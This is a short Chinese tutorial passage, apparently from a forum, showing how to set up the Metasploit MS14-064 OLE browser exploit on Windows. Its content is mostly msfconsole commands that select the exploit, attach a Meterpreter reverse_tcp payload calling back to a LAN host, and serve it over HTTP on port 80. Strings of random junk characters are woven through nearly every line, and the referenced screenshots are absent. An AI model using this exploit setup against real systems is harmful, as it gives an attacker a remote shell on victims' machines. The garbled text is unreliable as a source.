+ Y) I. B% P! A
我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示+ S( x! m7 ]) s! ?) d7 G
3 E+ f* \5 j) ]- U) ^7 f" \1 _
% }& z5 K' F& `& l4 s 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: 8 z) ]& L$ @0 ]" Z$ a, `
% g1 P: @0 \, e
# E) t; J4 |% r+ g! i 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp
8 W' |& f2 q O* m! ^9 }- X; \
# x4 A$ I6 P4 i: f r
3 i$ [. E8 @$ V/ w8 s set AllowPowershellPrompt true+ c' S1 |5 O8 T$ g9 }
7 Q+ p* h$ C( s6 \; {% ^3 H
6 j w. j% ^- T: s7 l- d: F Set LHOST 192.168.0.109
+ Y1 b# H3 ]1 i, g" k4 [+ i
+ v& r8 ^2 m+ D: I
7 a. ?$ a: c/ ^5 |. m2 P! ?& t6 [
set SRVHOST 192.168.0.1092 U5 ~5 C% @; i* o7 |; [* w
) d( E* }1 u6 e+ @& Z! ~4 d& I% j6 u. i. y
Set uripath share* ^% {5 t3 `$ t' M1 L/ v
2 S- x6 I0 E! U! [$ Z c
6 B/ ]* e2 z& o
Set srvport 80# `( m6 p2 z8 N8 y u
8 h6 H! K+ o; j& o, O3 f
U4 q/ ]# F" \. N$ |
; t3 f3 L g+ A% {, \' M
" I9 K* j$ x; p% p: Q
- P4 G8 Q0 F. R
, n: s; l' l! Y9 r7 D
2 _+ p) U4 L. W4 o
; S) g& X- p" J. h! p: P- E7 F " [% V2 o- C6 ?) f
8 y) ]. N$ s6 k; I. e% b
( B) n+ K4 y8 V x) U
* u7 _& Q+ ~: A) L+ a# \. _
8 G0 e' |3 t# E6 i! l
; X, ~& p' M; F. U% H / x( W, I1 g& }1 F: p- C
6 n0 _. l. F h; J" y) s6 y
# G- D4 e, F+ K2 \9 F6 m
下面我们来访问本地地址如图:/ Z T: _" ^. S/ B. p; ~; ^
$ D' J. S. @% R+ G( [# s- h4 s* Z2 d [ v; U* a M; F
3 P) s. m" ^! L$ n1 n" R( W
; h' G( f8 S" Y8 ?) s+ K' v
& J& b' e$ G9 c2 L
* b, b. y2 b l, c9 U0 e
* M& i% {1 b: w
, q$ j" w& M D M' a
7 o1 Q7 V2 n! |) [ {4 l